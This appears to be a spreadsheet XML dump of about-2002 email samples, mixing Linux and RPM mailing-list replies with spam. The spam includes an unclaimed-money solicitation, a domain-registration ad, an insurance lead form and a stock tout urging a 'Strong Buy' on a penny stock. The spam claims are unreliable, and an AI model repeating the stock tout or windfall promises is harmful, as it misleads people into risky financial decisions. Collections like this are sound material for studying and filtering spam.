                 owners.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=47&gt;&lt;IMG height=5 src="http://image.consumerpackage.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=40 src="http://image.consumerpackage.net/promotions/fmimages/featured.gif" width=316 
                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;There are &lt;B&gt;31 
                   million&lt;/B&gt; North American people eligible right now to claim unknown 
                   cash windfalls. The search is Fast, Easy and GAURANTEED&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Over &lt;B&gt; BILLION&lt;/B&gt; is 
                   sitting in our database alone, which contains bank and government accounts, wills and estates, insurance settlements etc.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=middle width="100%" bgColor=#ffffff colSpan=2 
                 height=65&gt;&lt;IMG height=5 src="http://image.consumerpackage.net/promotions/fmimages/c-pix.gif" 
                   width=1 border=0&gt;&lt;BR&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;IMG 
                   height=56 src="http://image.consumerpackage.net/promotions/fmimages/9outof10.gif" width=458 
                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;CENTER&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Since 1994, our Web site 
                   has reunited millions upon millions of dollars with thousands 
                   of rightful owners -- &lt;B&gt;who didn't even know&amp;nbsp;&lt;/B&gt; they 
                   had money waiting for them.&amp;nbsp;&lt;/FONT&gt; 
                   &lt;CENTER&gt;&lt;/CENTER&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;Click here&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT color=#666666&gt; 
                   NOW or on the link below to find out -- in seconds -- if there 
                   is money waiting to be claimed in your family name or that of 
                   somebody you know. The INITIAL SEARCH IS 
 FREE.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width="100%" bgColor=#ffffff colSpan=2 height=153&gt;
                   &lt;P align=center&gt;&lt;FONT color=#000000 size=3&gt;&lt;B&gt;YOU HAVE NOTHING 
                   TO LOSE ....&amp;nbsp;&lt;BR&gt;TRY 
                   FOUNDMONEY TODAY&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;P align=center&gt;&lt;A href="http://track.consumerpackage.net/cgi-bin/a?e=3444431.13"&gt;&lt;FONT 
                   color=#006666&gt;&lt;B&gt;CLICK HERE NOW!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
                   &lt;P&gt;&lt;FONT color=#666666&gt;Sincerely,&lt;BR&gt;ConsumerPackage.com &amp; 
                   Foundmoney&lt;/FONT&gt;&lt;/P&gt;
                   &lt;P&gt; 
       &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;IMG 
       height=15 src="http://image.consumerpackage.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt; 
   &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.consumerpackage.net/?e=jm@netnoteinc.com&gt;http://opt-out.consumerpackage.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hmm.
 Make sure you formatted the partition with fat 16 and have made the
 partition /dev/hda1 a size such that dos won't have a problem recognising
 it!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">PUBLIC ANNOUNCEMENT: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com. Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 47
 3425bIVX9-576TTPZ2202wRsT2-106BzwN7680xwac1-861Uzkc5802cqaK9-865syeF3453GTvsl72
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bournemouth blues
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8666353,215/
 Date: 2002-10-08T12:47:59+01:00
 *Cartoon: Steve Bell *on the Conservative party conference.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sometimes Less is More...
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_84D25_01C24EAF.CD089410
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Maximizer Select	
  Want to pay less for term insurance?	
 Find out how your clients can pay less by paying
 more - - while you earn more commission. 	
  	Simplified Underwriting	  	Advanced Commissions	 
  	Return of Premium	  	Renewal Commissions	 
 Call today to find out how
 CNA's Maximizer Select will work for you! 	
  800-397-9999	
 Please fill out the form below for more information	 
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	  	
   _____  
 CNA and CNA Life are registered service marks, trade names and domain
 names and CNA Maximizer is a registered service mark of CNA Financial
 Corporation. CNA life insurance products are underwritten by Valley
 Forge Life Insurance Company, one of the CNA companies. Policy form
 numbers: V100-1201-A, V100-1202-A, V100-1203-A, V100-1204-A Series.
 These products and features are not available in all states. For
 Producer use only.
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  	
 ------=_NextPart_000_84D25_01C24EAF.CD089410
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Sometimes Less is More...&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#006666" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/FB/top.jpg" width=3D"550" =
 height=3D"99" alt=3D'Maximizer Select'&gt;&lt;td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/FB/tag.jpg" width=3D"550" =
 height=3D"122" alt=3D'Want to pay less for term insurance?'&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;font color=3D"#006666"&gt;&lt;b&gt;Find out how your clients can pay =
 less by paying&lt;br&gt;more - - while you earn more commission.&lt;/b&gt;&lt;/font&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"62" align=3D"right"&gt; &lt;img =
 src=3D"http://iiq.us/images/FB/bullet.gif" width=3D"40" =
 height=3D"38"&gt;&lt;/td&gt;
           &lt;td width=3D"222"&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Simplified =
 Underwriting&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"47" align=3D"right"&gt; &lt;img =
 src=3D"http://iiq.us/images/FB/bullet.gif" width=3D"40" =
 height=3D"38"&gt;&lt;/td&gt;
           &lt;td width=3D"219"&gt;&lt;b&gt;Advanced Commissions&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"62" align=3D"right"&gt; &lt;img =
 src=3D"http://iiq.us/images/FB/bullet.gif" width=3D"40" =
 height=3D"38"&gt;&lt;/td&gt;
           &lt;td width=3D"222"&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Return of =
 Premium&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D"47" align=3D"right"&gt; &lt;img =
 src=3D"http://iiq.us/images/FB/bullet.gif" width=3D"40" =
 height=3D"38"&gt;&lt;/td&gt;
           &lt;td width=3D"219"&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Renewal =
 Commissions&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
 						&lt;font size=3D"3" color=3D"#006666"&gt;&lt;b&gt;Call today to find out =
 how&lt;br&gt;CNA's Maximizer Select will work for you!&lt;/b&gt;&lt;/font&gt;
 					&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/FB/phone.gif" width=3D"459" height=3D"59" =
 alt=3D'800-397-9999'&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
 						&lt;table width=3D"100%" border=3D"0" cellpadding=3D"0" =
 cellspacing=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt; &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                       &lt;tr bgcolor=3D"#006666"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 color=3D"#FFFFFF"&gt;&lt;b&gt;Please fill out the form below for more =
 information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://iiq.us/images/q2.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"ptarrence@fb-inc.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Financial Brokerage Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;hr width=3D"500"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/FB/logo.gif" width=3D"412" =
 height=3D"140"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt; &lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"1"&gt;CNA=20
             and CNA Life are registered service marks, trade names and =
 domain=20
             names and CNA Maximizer is a registered service mark of CNA =
 Financial=20
             Corporation. CNA life insurance products are underwritten by =
 Valley=20
             Forge Life Insurance Company, one of the CNA companies. =
 Policy form=20
             numbers: V100-1201-A, V100-1202-A, V100-1203-A, V100-1204-A =
 Series.=20
             These products and features are not available in all states. =
 For Producer=20
             use only.&lt;br&gt;
             &lt;br&gt;
             We don't want anybody to receive our mailing who does not =
 wish to=20
             receive them. This is a professional communication sent to =
 insurance=20
             professionals. To be removed from this mailing list, DO NOT =
 REPLY=20
             to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;http://www.insuranceiq.com/op=
 tout&lt;/a&gt;&lt;br&gt;
             &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_84D25_01C24EAF.CD089410--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 20:28, Matthias Saou wrote:
 &gt; I guess I'll settle for the /dev/dvd link change as described and putting
 &gt; the DMA tip in the %description :-)
 Thanks, I'll sleep better now :)
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: rpm-zzzlist@freshrpms.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, dTd wrote :
 &gt; 
 &gt; Thanks for the great work Mathias but I would like to point out that this
 &gt; list is fastly become the apt-rpm-list instead of the rpm-list. The
 &gt; discussion concerning apt is overwhelming. Maybe another list is in order
 &gt; for those having trouble with apt-rpm. apt-rpm-hotline@freshrpms.net ? :)
 &gt; 
 &gt; Though I think apt-rpm is a great tool, I don't use it and would like to
 &gt; get back to talk of new packages and rpm building techniques.
 Hmmm, know what? On http://lists.freshrpms.net/ the apt-list has been up
 for a while now ;-) There is almost no traffic though, since I wanted to
 keep that list for apt-rpm on the server side (mirrors, building
 repositories etc.), but hey, it could be a good place for general apt-rpm
 questions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</si>
  <si>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Paul Everitt: Interop in the Bazaar.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:4:54:52PM
 Date: Mon, 23 Sep 2002 23:54:52 GMT
 Paul Everitt: Interop in the Bazaar[1].
 [1] http://advogato.com/article/544.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Telecom Consolidation Begins to Accelerate.................... qsv
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;IGTT&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;img src="http://www.developerhosting.com/lqtracker/imgtrk.asp?id=40165&amp;uid=1290" width="1" height="1" border="0"&gt; 
 &lt;div align="center"&gt;
 &lt;table width="92%" border="1" bordercolor="#333333"&gt;
 &lt;tr&gt; 
 &lt;td height="23"&gt; 
 &lt;div align="center"&gt;
 &lt;div align="center"&gt;
 &lt;div align="center"&gt; 
 &lt;div align="center"&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="2" face="Courier New, Courier, mono"&gt;Vol. 
 6, Issue 243 - August 2002&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="6"&gt;&lt;font face="Impact" size="7" color="#FF0000"&gt;The 
 Wall Street Bulletin&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;&lt;font size="4" face="Times New Roman, Times, serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Your 
 First Source For News From &amp;quot;The Street&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;p align="center"&gt;Symbol: &lt;b&gt;&lt;font color="#FF0000"&gt;IGTT&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Shares Outstanding: 373,400,0000&lt;br&gt;
 Float (est.): 52,560,000&lt;br&gt;
 Short-Term Target: $3.75&lt;br&gt;
 52 week High/Low: $1.10/0.02&lt;br&gt;
 Rating: Strong Buy &lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3" color="#000000"&gt;&lt;b&gt;Our last pick 
 Symphony Telecom (OTCBB: SYPY) went UP 100% in just one week!!!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" size="3"&gt;&lt;em&gt;InDigiNet Identifies 
 Acquisition Targets with Combined Revenues of $35 Million...&lt;/em&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Telecom Consolidation Begins to Accelerate 
 &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="5"&gt;T&lt;/font&gt;he Wall Street Bulletin believes 
 that the &lt;a href="http://moneycentral.msn.com/content/P26293.asp?special=msn"&gt;recent 
 investment of capital into Level 3, lead by Warren Buffett&lt;/a&gt;, 
 is further proof of the continued validity of the telecommunication 
 market when looked at from the perspective of the small to mid-sized 
 enterprises. After the boom and bust comes the revival. For some 
 carriers drowning in debt, such as Global Crossing and WorldCom, 
 the future may be dim. But for those survivors of the industry 
 that have managed to remain on their feet, other companies' problems 
 mean opportunity. &amp;quot;Every major industry in the history of 
 the United States has experienced a similar transformation, from 
 the railroads in the late 1800s to the automakers in the mid-1900s 
 to the Dot-Coms at the end of the 20th century,&amp;quot; says &lt;a href="http://www.commweb.com/article/COM20010403S0001"&gt;Robert 
 Saunders&lt;/a&gt;, director of the Eastern Management Group market 
 research firm. &lt;a href="http://www.eftia.com/about/exec/dean.html"&gt;Christopher 
 Dean&lt;/a&gt;, CTO of OSS company Eftia, says &amp;quot;We are seeing all 
 the people that are the survivors. There's all this pent-up money 
 and for the surviving carriers out there, they can get what used 
 to cost a few billion for a few millions.&amp;quot; &lt;em&gt;Read the full 
 story from Telecommunications Magazine - See the link at the end 
 of this newsletter.&lt;/em&gt; &lt;/p&gt;
 &lt;p align="left"&gt;As we write this report, our New Recommendation 
 InDigiNet, Inc. (&lt;a href="http://moneycentral.msn.com/scripts/webquote.dll?ipage=qd&amp;Symbol=igtt&amp;SUBMIT1=Go"&gt;OTCBB: 
 IGTT&lt;/a&gt;) has only been trading on the OTC Bulletin Board since 
 late May of 2002. As InDigiNet, Inc. continues to implement its 
 business plan, we believe this company will help lead the way 
 up for the resurgence of the Telecom Sector. This could be our 
 strongest recommendation of the year. We are giving IGTT our Highest 
 Rating of STRONG BUY/AGGRESSIVE GROWTH.&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Ground Floor Opportunity / Tremendous 
 Growth Potential &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;We believe IGTT will perform equally to, if not 
 greater than its competition. A similar telecommunications company, 
 Talk America Holdings (Nasdaq: TALK), &lt;a href="http://bigcharts.marketwatch.com/quickchart/quickchart.asp?symb=talk&amp;sid=0&amp;o_symb=talk&amp;freq=1&amp;time=7"&gt;share 
 price began to explode in April of this year moving from just 
 over $0.40/share to over $4.00/share in late June&lt;/a&gt;. Talk America 
 Holdings previously had a market cap of only $24.51 million, but 
 today has a market cap of $267 million.&lt;/p&gt;
 &lt;p align="left"&gt;IGTT curently has a market cap of $22.42 million. 
 Using the TALK model for potential growth, IGTT could very well 
 be trading in the .60 range in only a few months, with a market 
 cap in excess of $250 million. This would be an increase of 1000%. 
 So you see why IGTT has such great potential and the time is right 
  for investors to get in on the ground floor.&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The &lt;em&gt;InDigNet&lt;/em&gt; Strategy&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet, Inc. is an integrated solutions company 
 that provides small to mid-sized enterprises (SMEs) with an integrated 
 communication solution. InDigiNet is a prestigious &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B35CA79AF-6477-4734-90E1-97EC3455E773%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;&amp;quot;Diamond&amp;quot; 
 level partner of Avaya&lt;/a&gt;, as well as a reseller for Cisco and 
 Compaq. The Company will offer data, local, long distance and 
 wireless services to SMEs over third party networks enabling the 
 Company to offer a comprehensive suite of services without the 
 capital burden of building a communication network. The Company&amp;#8217;s 
 strategy is to acquire the customer bases of smaller, single market 
 communication companies and attractively priced &lt;a href="http://webopedia.com/TERM/I/ISP.html"&gt;Internet 
 Service Providers &lt;/a&gt;(ISPs). &lt;em&gt;The Company recently completed 
 its acquisitions of Fox Telecommunications and WBConnect&lt;/em&gt;. 
 InDigiNet will then expand the breadth of their services to grow 
 revenue and enhance profitability. SMEs account for $120 billion 
 in commercial telephony, data services and technology spending, 
 or 33% of the country&amp;#8217;s total market, and this spending 
 is expected to grow at above average rates over the next ten years. 
 &lt;em&gt;Source: Morgan Stanley Dean Witter&lt;/em&gt;. &lt;/p&gt;
 &lt;p align="left"&gt;The IGTT web site: &lt;a href="http://www.indiginet.com"&gt;www.indiginet.com&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The&lt;em&gt; &lt;/em&gt;IT Market&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;Based on recent studies, the country&amp;#8217;s 7.4 
 million SMEs currently lag significantly in the utilization of 
 &lt;a href="http://webopedia.com/TERM/I/IT.html"&gt;IT&lt;/a&gt; and data 
 communications, including Internet access, web services, business 
 software and e-commerce. Worldwide IT spending increased to $981 
 billion US for the year, an overall increase of 3.7 percent over 
 2001, according to a study released 7/24/2002 by market researcher 
 IDC. IT spending in 2003 is expected to reach record heights, 
 growing by 9 percent worldwide to top the $1 trillion mark for 
 the first time. In IDC's revised forecasts for IT spending in 
 2002 and 2003, IT spending in the US is expected to increase by 
 3 percent this year over 2001 to $436 billion, with further growth 
 of 9 percent in 2003. Western Europe can expect growth of 4 percent 
 in 2002 and 6 percent in 2003. Though Japan will experience flat 
 growth levels this year, by next year growth in the market will 
 return to the tune of 7 percent with particular strength shown 
 in China, India, Korea, Russia, the Philippines, South Africa 
 and Poland. &lt;em&gt;Source: &lt;a href="http://www.idc.com/en_US/st/aboutIDC.jhtml;jsessionid=2J2GJSTTFNK4MCTFA4FCFGAKMUDYWIWD"&gt;IDC&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Particulars&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;The Wall Street Bulletin is putting IGTT on our 
 Strong Buy/Aggressive Growth recommendation list for the following 
 reasons:&lt;/p&gt;
 &lt;p align="left"&gt;1. The Company's strategy is to acquire the customer 
 bases of smaller, single-market communication companies and attractively 
 priced Internet Service Providers (ISPs). The Company will sell 
 its bundled service package to the acquired customer base that 
 will form a direct and immediate distribution channel for all 
 types of communication services - local, long distance, wireless, 
 and data. &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 2. The Company is currently serving many customers in the Denver/Front 
 Range communities but in particular the education vertical market 
 has recognized the value of integrating a wireless broadband data 
 network into the existing campus network. The Company's customers 
 include &lt;a href="http://www.usoc.org/"&gt;United States Olympic Committee&lt;/a&gt; 
 (USOC), &lt;a href="http://www.du.edu/"&gt;University of Denver&lt;/a&gt;, 
 and &lt;a href="http://www.colostate.edu/"&gt;Colorado State University&lt;/a&gt;. 
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 3. The Company has identified approximately $35,000,000 in revenues 
 to acquire comprised of distressed assets to be auctioned in bankruptcy 
 court and smaller communication providers with valuable customer 
 bases. Each of the targeted companies are within the Company's 
 footprint and will, subject to purchase completion, increase the 
 Company's embedded customer base. &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Investment Consideration&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet Inc recently filed its 10QSB, for the 
 three months ended March 31, 2002. IGTT reported Revenues of $339,694 
 in Q1 2002 vs. Revenues of $0 in Q1 2001. At this current growth 
 rate, revenues should grow above $1.3 million for their first 
 year of production with no increases in acquisitions. As more 
 and more large corporations come under government scrutiny, investors 
 will turn to small to mid-sized companies with their investment 
 dollars. &lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 Fox Telecommunications, Inc. - &lt;em&gt;PRNewswire - &lt;/em&gt;&lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B42FC3A33-75F2-4246-AFBE-0FF24082C128%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 WBConnect&lt;em&gt; - PRNewswire&lt;/em&gt; - &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B5877DA16-41D7-4F15-942D-BE31B81F38A7%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - Telecom Consolidation Begins to Accelerate 
